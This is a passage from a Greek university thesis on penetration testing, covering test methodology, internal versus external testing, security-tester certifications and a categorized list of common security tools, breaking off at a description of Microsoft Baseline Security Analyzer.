− Επιθέσεις περιγραφέων αρχείων (File Descriptor Attacks). Οι περιγραφείς αρχείων

είναι αριθμοί που χρησιμοποιούνται από το σύστημα για την παρακολούθηση της θέσης

των αρχείων, αντί των ονομάτων τους. Συγκεκριμένοι τύποι περιγραφέων αρχείων

υποδηλώνουν τις χρήσεις τους. Όταν ένα πρόγραμμα, το οποίο εκτελείται με δικαιώματα

διαχειριστή, ορίσει έναν ακατάλληλο περιγραφέα αρχείων, εκθέτει το αρχείο σε κίνδυνο.

− Race Conditions. Μπορεί να εμφανιστεί κατά τη χρονική στιγμή όπου ένα πρόγραμμα ή

η διαδικασία εκτελείται με δικαιώματα διαχειριστή. Ένας χρήστης μπορεί να

προγραμματίσει μια επίθεση με σκοπό να εκμεταλλευτεί αυτά τα δικαιώματα ενώσω το

πρόγραμμα εκτελείται σε αυτή την κατάσταση.

− Λανθασμένες άδειες χρήσης αρχείων και καταλόγων (Incorrect File and Directory

Permissions). Οι άδειες χρήσης αρχείων και καταλόγων ελέγχουν το επίπεδο πρόσβασης

που επιτρέπεται στους χρήστες και τις διαδικασίες. Οι ορισμός αδειών με υψηλό επίπεδο

πρόσβασης ενδέχεται να επιτρέψει πολλούς τύπους επιθέσεων, συμπεριλαμβανομένης

Page 89: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

89 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

της ανάγνωσης ή της εγγραφής αρχείων ή της προσθήκης συνθηματικών στον κατάλογο

έγκυρων χρηστών απομακρυσμένων τερματικών.

Αναφορές

Η φάση υποβολής αναφορών εμφανίζεται ταυτόχρονα με τις άλλες τρεις φάσεις του ελέγχου

διείσδυσης όπως φαίνεται στην εικόνα 3.1. Στη φάση προγραμματισμού, το σχέδιο

αξιολόγηση αναπτύσσεται και υποβάλλεται στη διοίκηση για έγκριση. Στις φάσεις

ανίχνευσης και επίθεσης, τα καταγεγραμμένα αρχεία εισόδου (logs) φυλάσσονται και οι

περιοδικές εκθέσεις υποβάλλονται στο διαχειριστή του συστήματος και/ή στη διοίκηση.

Κατά την ολοκλήρωση του ελέγχου, αναπτύσσεται μια συνολική έκθεση η οποία περιγράφει

τις ευπάθειες οι οποίες εντοπίσθηκαν, παρουσιάζει μια εκτίμηση κινδύνου για αυτές και

παρέχει οδηγίες για την αντιμετώπιση τους.

3.4 Διαχείριση ελέγχων διείσδυσης

Τα σενάρια ελέγχων διείσδυσης πρέπει να εστιάζουν στον εντοπισμό εκμεταλλεύσιμων

ατελειών στη σχεδίαση και την υλοποίηση μιας εφαρμογής, ενός συστήματος, ή ενός

δικτύου. Οι έλεγχοι πρέπει να αναπαραγάγουν τόσο το πιο πιθανό όσο και το πιο

καταστρεπτικό σχέδιο επίθεσης, συμπεριλαμβανομένων και των σεναρίων όπου οι

κακόβουλες ενέργειες προέρχονται από τους διαχειριστές του συστήματος. Δεδομένου ότι

ένα σενάριο ελέγχου διείσδυσης μπορεί να σχεδιαστεί ώστε να μιμείται μια εσωτερική

επίθεση, μια εξωτερική επίθεση, ή και οι δύο, εξετάζονται οι εξωτερικές και εσωτερικές

μέθοδοι ελέγχου ασφαλείας. Εάν πρόκειται να εκτελεσθούν τόσο εσωτερικοί όσο και

εξωτερικοί έλεγχοι, είναι προτιμότερο να διενεργούνται πρώτα οι εξωτερικοί.

Τα σενάρια εξωτερικών ελέγχων μιμούνται τον εξωτερικό εισβολέα ο οποίος έχει ελάχιστη ή

καμία γνώση του στό χου και ο ο πο ίο ς εργάζεται εξ ολοκλήρου με υποθέσεις. Για να

μιμηθούν μια εξωτερική επίθεση, οι ελεγκτές δεν διαθέτουν άλλες πραγματικές πληροφορίες

για το περιβάλλον του στόχου εκτός από τις διευθύνσεις IP ή τις περιοχές διευθύνσεων ΙΡ

του οργανισμού για τον οποίο διενεργείται ο έλεγχος. Εάν τους χορηγηθεί μια λίστα

διευθύνσεων ΙΡ οι οποίες θα χρησιμοποιηθούν σαν στόχος, οι ελεγκτές πρέπει να

επιβεβαιώσουν ότι όλες οι δημόσιες διευθύνσεις ανήκουν στον οργανισμό, πριν ξεκινήσουν

τους ελέγχους. Οι ιστοσελίδες που παρέχουν πληροφορίες για καταχωρημένα ονόματα

domain (π.χ. WHOIS) μπορούν να χρησιμοποιηθούν για να καθοριστεί η περιοχή

διευθύνσεων που ανήκουν στον οργανισμό. Η αναζήτηση σε ανοικτές πηγές πληροφόρησης

Page 90: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

90 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

(ιστοσελίδες, newsgroups, sites κοινωνικής δικτύωσης, κλπ) με σκοπό τη συλλογή

πληροφοριών για το στόχο κρίνεται απαραίτητη.

Εργαλεία όπως Port scanners και vulnerability scanners χρησιμοποιούνται στη συνέχεια για

τον προσδιορισμό των κόμβων του στόχου. Δεδομένου ότι οι ενέργειες των ελεγκτών

περνούν συνήθως από firewalls, το πλήθος των πληροφοριών που λαμβάνεται από τις

σαρώσεις είναι πολύ λιγότερο από το εάν ο έλεγχος γίνονταν εσωτερικά. Αφού

προσδιορίσουν οι κόμβοι του δικτύου που μπορούν να προσεγγιστούν από το εξωτερικό

περιβάλλον, οι ελεγκτές προσπαθούν να εκθέσουν σε κίνδυνο έναν από αυτούς. Εάν το

επιτύχουν, μπορούν να χρησιμοποιήσουν αυτή την πρόσβαση για να εκθέσουν σε κίνδυνο

και άλλους κόμβους που δεν είναι προσιτοί έξω από το δίκτυο. Ο έλεγχος διείσδυσης είναι

μια επαναληπτική διαδικασία η οποία απαιτεί ελάχιστη πρόσβαση και η οποία μπορεί να

οδηγήσει στην απόκτηση μεγαλύτερης.

Τα σενάρια εσωτερικών ελέγχων διείσδυσης μιμούνται τις ενέργειες ενός κακόβουλου

εσωτερικού επιτιθέμενου. Ένας εσωτερικός έλεγχος διείσδυσης είναι παρόμοιος με έναν

εξωτερικό έλεγχο, εκτός από το ότι οι ελεγκτές βρίσκονται στο εσωτερικό δίκτυο (δηλ.,

πίσω από το Firewall) και τους έχουν χορηγηθεί κάποια επίπεδα πρόσβασης στο δίκτυο ή σε

συγκεκριμένα συστήματα του δικτύου. Χρησιμοποιώντας αυτά τα δικαιώματα πρόσβαση, οι

ελεγκτές διείσδυσης προσπαθούν να αποκτήσουν μεγαλύτερα επίπεδα πρόσβασης στο

δίκτυο και στα συστήματα του μέσω της κλιμάκωσης προνομίων. Στους ελεγκτές

παρέχονται τόσες πληροφορίες για το δίκτυο όσες θα είχε και κάποιος χρήστης με το δικό

τους επίπεδο πρόσβασής. Γενικά παραχωρούνται δικαιώματα απλού χρήστη, αν και ανάλογα

με τους στόχους της δοκιμής μπορούν να παραχωρηθούν και δικαιώματα διαχειριστή του

συστήματος ή του δικτύου.

Ο έλεγχος διείσδυσης είναι σημαντικός για τον καθορισμό των ευπαθειών του δικτύου ενός

οργανισμού και των επιπτώσεων που μπορούν να επιφέρουν οι κίνδυνοι αν

πραγματοποιηθούν. Ανάλογα με τις πολιτικές ασφάλειας που εφαρμόζει ο οργανισμός,

μπορεί να απαγορευθεί στους ελεγκτές η χρησιμοποίηση κάποιων εργαλείων ή τεχνικών ή

μπορεί να περιοριστεί η χρήση τους μόνο συγκεκριμένες ώρες της ημέρας ή των ημερών της

εβδομάδας. Ο έλεγχος διείσδυσης ενδέχεται να εκθέσει σε κίνδυνο τα δίκτυα και τα

συστήματα του οργανισμού επειδή χρησιμοποιεί πραγματικά εργαλεία εκμετάλλευσης

ευπαθειών και πραγματικές επιθέσεις ενάντια στα συστήματα και τα δεδομένα. Λόγω του

υψηλού κόστους και των πιθανών επιπτώσεών τους, οι έλεγχοι διείσδυσης στο δίκτυο και τα

συστήματα ενός οργανισμού μπορούν να πραγματοποιούνται ικανοποιητικά σε ετήσια βάση.

Page 91: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

91 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Επίσης, ο έλεγχος διείσδυσης μπορεί να έχει ως σκοπό να σταματήσει όταν φθάνει ο

ελεγκτής σε ένα σημείο όπου οποιαδήποτε επιπρόσθετη ενέργεια θα προκαλέσει ζημία. Τα

αποτελέσματα του ελέγχου διείσδυσης πρέπει να αντιμετωπιστούν σοβαρά, και

οποιεσδήποτε ευπάθειες ανακαλυφθούν πρέπει να περιοριστούν. Τα αποτελέσματα, όταν

ολοκληρωθούν οι έλεγχοι, πρέπει να παρουσιαστούν στη διοίκηση του οργανισμού. Οι

οργανισμοί πρέπει να διενεργούν λιγότερο εντατικούς ελέγχους σε τακτά χρονικά

διαστήματα, ώστε διασφαλιστεί ότι τα επιθυμητά επίπεδα ασφάλειας διατηρούνται. Οι

τακτικοί έλεγχοι με εργαλεία σάρωσης δικτύου και εργαλεία εντοπισμού ευπαθειών καθώς

και ο περιοδικός έλεγχος διείσδυσης, μπορεί να βοηθήσει ώστε να αποτραπούν πολλοί τύποι

επιθέσεων και να μειωθούν οι πιθανές επιπτώσεις από αυτές.

3.5 Πιστοποιήσεις Αξιολογητών Ασφάλειας

Στο χώρο της αξιολόγησης ασφαλείας απαιτείται μεγάλη προσοχή ως προς το άτομο ή την

ομάδα η οποία θα διενεργήσει την αξιολόγηση, διότι οι πληροφορίες που αποκαλύπτονται

είναι στις περισσότερες περιπτώσεις εμπιστευτικές ακόμα και απόρρητες. Γι’ αυτό το λόγο

πρέπει οι προθέσεις του αξιολογητή καθώς και η μέθοδος αξιολόγησης του να είναι

ξεκάθαρές. Εάν αυτό δεν συμβαίνει ενδέχεται να δημιουργηθούν προβλήματα τόσο ως προς

την νομιμότητα της διαδικασίας όσο και ως προς την αποτελεσματικότητα της. Υπάρχουν

πολλές πιστοποιήσεις οι οποίες είναι αναγνωρισμένες από τις κυβερνήσεις και το χώρο της

ασφάλειας πληροφοριακών συστημάτων. Οι πιστοποιήσεις αυτές στοχεύουν είτε στο να

διασφαλίσουν στον οργανισμό ότι ο αξιολογητής γνωρίσει τις κατάλληλες διαδικασίες, είτε

ότι ο αξιολογητής χρησιμοποιεί εργαλεία των οποίων οι διαδικασίες είναι πιστοποιημένες.

Οι πλειονότητα των πιστοποιήσεων που αφορούν την ασφάλεια ποικίλουν ανάλογα με την

εταιρεία. Πιο συγκεκριμένα, μεγάλες εταιρείες δημιουργούν δικές τους πιστοποιήσεις

ασφάλειας, όπως οι Cisco, Check Point, Citrix, Microsoft, Novell και Red Hat οι οποίες

όμως εστιάζουν σε προϊόντα και υπηρεσίες με δικές τους ενσωματωμένες τεχνολογίες. Στις

πιστοποιήσεις αυτές υπάρχει διαβάθμιση ανά επίπεδο και ανά τομέα εξειδίκευσης, έτσι ώστε

να ανταποκρίνονται σε συγκεκριμένες ομάδες ατόμων (αρχάριους, προχωρημένους,

επαγγελματίες).

Οι πιο γνωστές πιστοποιήσεις που ακολουθούν μια μεθοδολογία στην αξιολόγηση

ασφαλείας είναι από τις εξής εταιρείες ή οργανισμούς:

Page 92: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

92 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• International Council of E-Commerce consultants (EC-Council)45

− Η Certified Ethical Hacker – CEH. Έχει σκοπό να εκπαιδεύσει τους υποψήφιους

αξιολογητές ασφαλείας σε τεχνικές Hacking, με στόχο την απόκτηση εμπειρίας και

την πρόσκτηση των απαραίτητων γνώσεων σε σχέση με την αξιολόγηση ασφάλειας.

Είναι ένας διεθνής

οργανισμός που απαρτίζεται από εμπειρογνώμονες της πληροφορικής, ακαδημαϊκούς και

επαγγελματίες από το χώρο του e-Business. Έχει δημιουργήσει τρεις πιστοποιήσεις οι

οποίες έχουν λάβει την έγκριση από την Υπηρεσία Εθνικής Ασφαλείας των Η.Π.Α.

(National Security Agency- NSA) και από την Επιτροπή των εθνικών συστημάτων

ασφαλείας των Η.Π.Α. (Committee on National Security Systems - CNSS):

− Η Computer Hacking Forensics Investigator – CHFI αφορά εκείνους που θέλουν

να εμπλακούν με την διαδικασία εύρεσης παράνομων αποτυπωμάτων σε

ηλεκτρονικά εγκλήματα. Ο σκοπός είναι να μπορεί ο υποψήφιος να ανιχνεύει

τέτοιου είδους ενέργειες και να γνωρίσει το νομικό πλαίσιο που τις καταδικάζει.

− Η License Penetration Tester – LPT εστιάζεται σε υποψηφίους οι οποίοι δουλεύουν

χρόνια στο χώρο της αξιολόγησης ασφαλείας. Στο πρόγραμμα αυτό γίνεται

λεπτομερή ανάλυση σε διάφορες μελέτες περιπτώσεων με σκοπό να εκπαιδευτούν

στις τρέχουσες καλύτερες επαγγελματικές πρακτικές.

• SANS ιδρύθηκε το 1989 από το ινστιτούτο προηγμένων τεχνολογιών Escal. Παρέχει

σεμινάρια κατάρτισης και πιστοποιήσεις στο χώρο της ασφάλειας των υπολογιστών και

κατέχει μια πληθώρα από ερευνητικό υλικό. Το 1999 δημιούργησε το GIAC (Global

Information Assurance Certification)46

• Η εταιρεία Offensive Security έχει δημιουργήσει την πιστοποίηση Offensive Security

Certified Professional certification

με στόχο να μπορεί ένας επαγγελματίας να

επικυρώσει τις γνώσεις του στην ασφάλεια υπολογιστών. Η μεθοδολογία που ακολουθεί

στα προγράμματα του το SANS, είναι απόλυτα συμβατή με τις προδιαγραφές της

Υπηρεσίας Εθνικής Ασφαλείας των Η.Π.Α, της Infrastructure Evaluation Methodology –

IEM και τα παγκόσμια εταιρικά πρότυπα. Οι πιστοποιήσεις GIAC εξετάζουν κυρίως

προηγμένες τεχνικές θεματικές περιοχές. Ανάμεσα σε αυτές ξεχωρίσει η GIAC Certified

Penetration Tester (GPEN) η οποία απευθύνεται σε άτομα που δουλεύουν στον χώρο

της αξιολόγησης ασφαλείας και χρειάζονται να βελτιώσουν τις τεχνικές αξιολόγησης

τους.

47

45http://www.eccouncil.org/index.htm

. Αυτή η πιστοποίηση στο πρόγραμμα εκπαίδευσης

της στηρίζεται στη διανομή Live Linux, γνωστή ως Backtrack. Η διανομή αυτή

46 http://www.giac.org/ 47 http://www.offensive-security.com/

Page 93: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

93 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

προορίζεται για επαγγελματίες που θέλουν να αξιολογήσουν την ασφάλεια των

πληροφοριακών συστημάτων.

• Η πιστοποίηση IT Health Check (CHECK)48

• Η πιστοποίηση TIGER Scheme

Team Leader/Member είναι το κρατικό

πρότυπο της Αγγλίας και στηρίζεται από την κυβερνητική ομάδα CESG -

Communications and Electronic Security Group. Το πρότυπο αυτό εδώ και πολλά χρόνια

έχει θέσει τις οδηγίες που πρέπει να ακολουθήσει μια εταιρεία για την ορθή διασφάλιση

της πολιτικής ασφαλείας της. Οι πιστοποίηση αυτή διασφαλίσει στις εταιρείες μέλη ότι

ακολουθούν το πρότυπο και στους πιστοποιημένους αξιολογητές ότι ακολουθούν στην

βιομηχανία της πληροφορικής τα ίδια πρότυπα. 49

• Η πιστοποίηση CREST Consultant (Council of Registered Ethical Security Testers)

όπως και το TIGER Scheme έχει στόχο να προωθήσει τους πιστοποιημένους της στην

άμεση επαγγελματική αποκατάσταση στον τομέα της αξιολόγησης ασφαλείας. Η

πιστοποίηση αυτή ακολουθεί στις διαδικασίες της τα πρότυπα της CESG και της CPNI

(Centre for the Protection of National Infrastructure -CPNI). Η διαφορά υπάρχει στο

γεγονός ότι οι εταιρείες που θα θελήσουν να προσλάβουν τους αξιολογητές CREST θα

πρέπει να έχουν πρώτα υιοθετήσει τα πρότυπα CREST.

είναι ένα από τα δύο μη-κυβερνητικά πρότυπα που

ισχύουν στην Αγγλία για την πιστοποίηση των δεξιοτήτων των αξιολογητών ασφαλείας.

Το πρόγραμμα αυτό γίνεται σε συνεργασία με το Glamorgan University και έχει την

υποστήριξη πολλών εταιρειών.

Επιπρόσθετα, υπάρχει ένα εργαλείο αξιολόγησης των διαδικτυακών εφαρμογών το οποίο

ακολουθεί πιστοποιημένες διαδικασίες. Το εργαλείο αυτό λέγεται Open Web Application

Security Project (OWASP)50

48

και έχει σαν στόχο να προσφέρει την δυνατότητα να

εντοπιστούν "τρωτά" σημεία σε διαδικτυακές εφαρμογές. Το έργο αυτό το κάνει να

ξεχωρίζει διότι έχει πολλά ενεργά μέλη που το υποστηρίζουν και μέσα σε αυτά υπάρχουν

εταιρείες όπως οι Google, VISA, Deloitte, Unisys και Foundstone. Το εργαλείο αυτό

υποστηρίζει όλες τις διαδικτυακές τεχνολογίες προγραμματισμού κατά την αξιολόγηση του

και μέσω το υ πλαισίου εργασίας το υ (OWASP Web Security Certification Framework)

πιστοποιεί το σύνολο της διαδικασία αξιολόγησης του.

http://www.cesg.gov.uk/ 49 http://www.tigerscheme.org/ 50 http://www.owasp.org/

Page 94: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

94 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Επίσης στον τομέα γενικότερα της ασφάλειας δεσπόζουν οι πιστοποιήσεις CISSΡ51, CISA52,

CISM κα ISO/IEC 2700153

Οι πιστοποιήσεις αυτές εξετάζουν τις διαδικασίες της ασφάλειας γενικότερα.

51 http://www.isc2.org/ 52 http://www.isaca.org/ 53 http://en.wikipedia.org/wiki/ISO_27001

Page 95: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

95 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Κεφάλαιο 4 Penetration Testing Tools

4.1 Εισαγωγή

Ο καλύτερος τόπος για να ελεγχθεί η ασφάλεια ενός πληροφοριακού συστήματος είναι ο

υπεύθυνος για την ασφάλεια του να προσπαθήσει να την παραβιάσει, χρησιμοποιώντας

εργαλεία και τεχνικές που χρησιμοποιούν οι εισβολείς. Θα πρέπει, δηλαδή, να εντοπίσει τα

τρωτά σημεία του και κατά συνέπεια να φροντίσει για την επιδιόρθωσή τους. Για το λόγο

αυτό υπάρχουν πολλά διαθέσιμα εργαλεία ελέγχου τρωτότητας (penetration tools), τόσο

εμπορικά όσο και ανοιχτού κώδικα, τα οποία εξυπηρετούν διαφορετικούς σκοπούς.

Εντοπίζουν δηλαδή διαφορετικές ευπάθειες.

Τα δημοφιλέστερα από αυτά τα εργαλεία μπορούν να κατηγοριοποιηθούν ως εξής54

:

• Εργαλεία συλλογής πληροφοριών (Footprinting Tools)

Τα πιο γνωστά εργαλεία είναι τα εξής: Nslookup, Whois, ARIN, Neo Trace, VisualRoute

Trace SmartWhois, eMailTrackerPro, Website watcher, Google, Google Earth, GEO

Spider, HTTrack Web, Googlag, MyIP Suite, BiLe Suite, Alchemy Network Tool, Wikt,

Lan Whois, Country Whois, WhereIsIP, Ip2country, CallerIP, Samspade, SpiderFoot,

Web The Ripper, Necrosoft Advanced DIG, DomainKing, Domain Name Analyzer, MSR

Strider URL Tracer, Mozzle Domain Name Pro, Path Analyzer Pro, Maltego, Read

Notify και Netcraft Toolbar.

• Εργαλεία εύρεσης συνθηματικών (Password Crackers)

Τα πιο γνωστά εργαλεία είναι τα Cain and Abel, John the Ripper, THC Hydra, Aircrack,

Airsnort, SolarWinds, Pwdump, RainbowCrack και το Brutus.

• Εργαλεία καταγραφής πακέτων (Packet Sniffers)

Όπως τα εξής: Wireshark, Tcpdump, Dsniff, Ettercap, NetStumbler και Ntop.

54 http://sectools.org/

Page 96: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

96 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Εργαλεία ανίχνευσης Ευπαθειών (Vulnerability Scanners)

Όπως τα εξής: Nessus, OpenVAS, GFI LANguard, Retina, Core Impact, ISS Internet

Scanner, X-scan, Sara, QualysGuard, SAINT και MBSA

• Εργαλεία ανίχνευσης Ευπαθειών σε διακομιστή ιστοσελίδων (Web Vulnerability

Scanners)

Όπως τα εξής: Nikto, Paros proxy, WebScarab, WebInspect, Burpsuite, Wikto, Acunetix

WVS, Watchfire AppScan και N-Stealth.

• Εργαλεία καταγραφής πακέτων σε ασύρματα δίκτυα (Wireless Tools)

Όπως τα εξής: Kismet, NetStumbler, Aircrack, Airsnort και KisMAC.

• Εργαλεία ανίχνευσης και εκμετάλλευσης Ευπαθειών (Vulnerability Exploitation

Tools )

Όπως τα εξής: Metasploit Framework, Core Impact και Canvas

• Εργαλεία καταγραφής και παραμετροποίησης πακέτων (Packet Crafting Tools)

Όπως τα εξής: Nmap, Hping2, Scapy, Nemesis και Yersinia.

Επιπλέον, τα εργαλεία αυτά έχουν κατασκευαστεί για να υποστηρίζουν ορισμένες ή μια

κατηγορίες λειτουργικών συστημάτων. Συνήθως, προορίζονται για συστήματα Linux και

Unix έτσι ώστε να μπορούν να χρησιμοποιούν την ευελιξία που προσφέρει η χρήση του

ανοιχτού κώδικα. Τα προγράμματα αυτά υλοποιούνται συνήθως ως λογισμικό ανοιχτού

κώδικα και υπάγονται σε άδειες χρήσης ελεύθερου λογισμικού. Αυτό έχει σαν αποτέλεσμα

οι χρήστες να διαμοιράζονται δωρεάν τα προγράμματα, να τα βελτιώνουν, να τα

τροποποιούν και να τα ενσωματώνουν πολλές φορές μεταξύ τους για λόγους ευχρηστίας.

Η ανάγκη για ενσωμάτωση όλων αυτών των εργαλείων ώθησε τους αξιολογητές ασφαλείας

να κατασκευάσουν διάφορες διανομές με σκοπό την αξιολόγηση ενός συστήματος. Οι

διανομές αυτές στηρίζουν την κατασκευή τους στο λειτουργικό σύστημα Linux και συνήθως

μπορούν να εκτελεστούν από την μνήμη του H/Y (Live – CDs διανομές) έτσι ώστε να μην

κρίνεται απαραίτητη η εγκατάσταση τους. Η δυνατότητα αυτή παρέχει την ευελιξία

πραγματοποίησης συχνών ελέγχων σε ένα πληροφοριακό σύστημα μέσω μια

παραμετροποιημένης εργαλειοθήκης η οποία διαθέτει μια πληθώρα σεναρίων ελέγχου

τρωτοτήτων.

Page 97: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

97 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Αξίζει να σημειωθεί ότι η πιο γνωστή διανομή ελέγχου τρωτότητας είναι η Backtrack55

η

οποία δημιουργήθηκε από την εταιρεία Offensive Security. Η συγκεκριμένη διανομή

αποτελεί την καλύτερη αυτή την στιγμή στον χώρο, διότι περιλαμβάνει μια πληθώρα

εργαλείων και ενσωματωμένων σεναρίων όσο καμία άλλη. Η τρέχουσα έκδοση της

διανομής είναι το Backtrack 4. Για χάρη διευκόλυνσης των αξιολογητών, η διανομή υπάρχει

διαθέσιμη και σε άλλες δύο μορφές εκτός του οπτικού δίσκου. Οι μορφές αυτές

προορίζονται για εγκατάσταση σε USB και για χρήση στο εικονικό περιβάλλον VMware.

Τα σενάρια που υπάρχουν μέσα σε αυτή την διανομή έχουν γίνει γνωστά λόγω της

παρο υσίασης τους μέσα από τα διάφο ρα βιβλία των δημιο υργών αυτής της έκδο σης. Ένα

επιπρόσθετο στοιχείο της διανομής είναι η ενεργή συμμετοχή εκατομμυρίων χρηστών στο

forum της και η συμβατότητα της με τα περισσότερα μοντέλα Η/Υ. Επιπλέον τα μέλη του

forum της επιλύουν πολλά προβλήματα που προκύπτουν και περιγράφουν συνεχώς νέες

τεχνικές Hacking.

4.2 Κριτήρια Επιλογής Παρουσίασης Εργαλείων Penetration Testing

Στη συνέχεια έχουν επιλεγεί για παρουσίαση κάποια εκ των εργαλείων ελέγχου τρωτοτήτων

που αναφέρθηκαν παραπάνω. Τα συγκεκριμένα εργαλεία επιλέχτηκαν με βάση τα εξής

κριτήρια:

• Είναι είτε ανοιχτού κώδικα, είτε ελεύθερα προς χρήση.

• Είναι δωρεάν διαθέσιμα μέσω του διαδικτύου.

• Υποστηρίζονται από όλα σχεδόν τα λειτουργικά συστήματα.

• Υπάρχει μια ενεργή κοινότητα που τα υποστηρίξει και τα εξελίσσει.

• Ξεχωρίσουν στην κατηγορία τους και συχνά ανταγωνίζονται επάξια εμπορικές

εφαρμογές.

• Υπάρχει εκτενής βιβλιογραφία και τεκμηρίωση για τρόπο χρήσης τους.

• Καλύπτουν ένα ευρύ φάσμα συχνών ευπαθειών των πληροφοριακών συστημάτων.

• Είναι εργαλεία που χρησιμοποιούν και οι εισβολείς.

• Εξυπηρετούν τους εκπαιδευτικούς και διδακτικούς στόχους ενός εργαστηρίου ασφάλειας

πανεπιστημιακού επιπέδου

55 http://www.backtrack-linux.org/

Page 98: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

98 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.3 Microsoft Baseline Security Analyzer (MBSA)

4.3.1 Ταυτότητα

Το Microsoft Baseline Security Analyzer (MBSA), το οποίο έχει κατασκευαστεί από την

εταιρεία Microsoft, είναι ένα εύχρηστο εργαλείο εντοπισμού ευπαθειών (vulnerability

scanner) το οποίο απευθύνεται σε επιχειρήσεις μικρού και μεσαίου μεγέθους και είναι

